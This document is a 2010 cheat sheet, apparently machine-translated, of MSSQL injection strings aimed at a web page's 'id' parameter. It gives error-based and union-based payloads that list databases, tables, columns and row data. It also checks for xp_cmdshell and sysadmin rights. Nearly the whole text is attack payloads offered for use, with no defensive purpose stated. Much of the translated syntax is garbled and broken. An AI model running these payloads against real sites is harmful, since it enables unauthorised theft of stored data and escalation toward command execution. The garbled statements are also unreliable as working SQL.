Title:mssql injection in explicit and non-error mode--2010-10-27 19:51
The recent use of manual injection with the habit, then list the most recent use of the MSSQL statement, later convenient to use!
--------------------------------------------------------------------------------------------------------------- --------------------
MSSQL Comment Symbol:
#
--
Error-mode:
Determine if multiple rows are supported
;d Eclare @x int--
View Current database version
Url?id=13 and @ @version >0--
View current Connected Database users
Url?id=13 and user>0--
View the current database name
Url?id=13 and db_name () >0--
Explode database name
Url?id=13 and 1=convert (int, (select name from master.dbo.sysdatabases where dbid=7))--
Dbid<7 is the system library name
Explode the current database table name
Url?id=13 and 1=convert (int, (select top 1 name from sysobjects where xtype= ' U '))--
Url?id=13 and 1=convert (int, (select top 1 name from sysobjects where xtype= ' U ' and name is not in (' Table name 1 ', ' Table Name 2 '))--
Explode other database table names
Url?id=13 and 1=convert (int, (select top 1 name from [database name]: sysobjects where xtype= ' u ')--
Url?id=13 and 1=convert (int, (select top 1 name from [database name]: sysobjects where xtype= ' u ' and name not in (' Table name 1 ', ' Table Name 2 '))--
Burst field Name
Url?id=13 having 1=1--
URL?ID=13 Group By table name. field Name 1, field name 2 having 1=1--
Explode the field names of other tables
URL?ID=13 select * FROM table name having 1=1--
URL?ID=13 select * FROM table name Group by table name. field Name 1, field name 2 having 1=1--
Expand it.
Url?id=13 and 1=convert (int, (SELECT * from table name having 1=1)--field name
Url?id=13 and 1=convert (int, (SELECT * from table name Group by table name. Field name having 1=1))--Field name
Burst data
Url?id=13 and 1=convert (int, (select top 1 field name from table name))--
Url?id=13 and 1=convert (int, (select top 1 field name from table name where field name not in (' Data 1 ', ' Data 2 ')--
Url?id=13 and 1=convert (int, (select TOP1 field name from table name where field name = = ' Data 1 ' and field name! = ' Data 2 '--
You can also use the WHERE statement
No error mode
url?id=13 Order By Field number
URL?ID=13 and 1=2 Union select?,?,?,?,?--
Querying the database version and system version
URL?ID=13 and 1=2 Union select?,?,?, @ @version--
Querying database user Names
URL?ID=13 and 1=2 Union select?,?,?, (Select User)--
URL?ID=13 and 1=2 Union select?,?,?, (select System_user)--
Query Host Name
URL?ID=13 and 1=2 Union select?,?,?, (select HOST_NAME ())--
Querying database names
URL?ID=13 and 1=2 Union select?,?,?, (select Db_name ())--
Determine storage extension xp_cmdshell
URL?ID=13 and 1=2 Union select?,?,?, (SELECT COUNT (*) from master.dbo.sysobjects where xtype= ' X ' and name= ' xp_cmdshell ')--
1 for existence, 0 for non-existent
Determine current database user permissions
URL?ID=13 and 1=2 Union select?,?,?, (select Is_srvrolemember (' sysadmin '))--
Querying database names
URL?ID=13 and 1=2 Union select?,?,? (select name from master.dbo.sysdatabases where dbid=7)--
DBID<7 is the system database name
Querying database table names
URL?ID=13 and 1=2 Union select?,?,? (select top 1 name from sysobjects where xtype= ' U ')--
URL?ID=13 and 1=2 Union select?,?,? (select top 1 name from sysobjects where xtype= ' U ' and name is not in (' Table name 1 ', ' Table Name 2 ')--
Query field name
URL?ID=13 and 1=2 Union select?,?,? (select top 1 name from database name. Dbo.syscolumns where id=object_id (' table name ')--
URL?ID=13 and 1=2 Union select?,?,? (select top 1 name from database name. Dbo.syscolumns where id=object_id (' table name ') and name not in (' Field name 1 ', ' Field Name 2 ')--
Querying data
URL?ID=13 and 1=2 Union select?,?,? (select top 1 field name from table name)--
URL?ID=13 and 1=2 Union select?,?,? (select top 1 field name from table name where field name not in (' Data 1 ', ' Data 2 ')--
The other statements
Name of the exploded table
Url?id=13 Url?id=13 and 1=2 Union select?,?,? (select top 1 name from sysobjects where xtype= ' u ' and name is not in (select top 0 name from sysobjects where xtype= ' u ')) fro M sysobjects--
Then query the table name (the number of the second top n is incremented from 0 to traverse the current database table name.
Explode other database table names
Url?id=13 Url?id=13 and 1=2 Union select?,?,? (select top 1 name from [database name]: sysobjects where xtype= ' u ' and name not in (select top 0 name from [database name]: sysobjects where xtype= ' u ')
Explode field
URL?ID=13 and 1=2 Union select?,?,? (select top 1 name from syscolumns where ID in (select id from sysobjects where name= ' table name ') and name not in (select Top 2 n Ame from syscolumns where ID in (select id from sysobjects where name= ' table name '))) from sysobjects--
Add the second top N number from 0 to traverse the field name of the admin table.
Querying data
Url?id=13 Url?id=13 and 1=2 Union select top 1?,?, field name from table name where name not in (select top 0 name from table name)--
MSSQL injection in error-and-error mode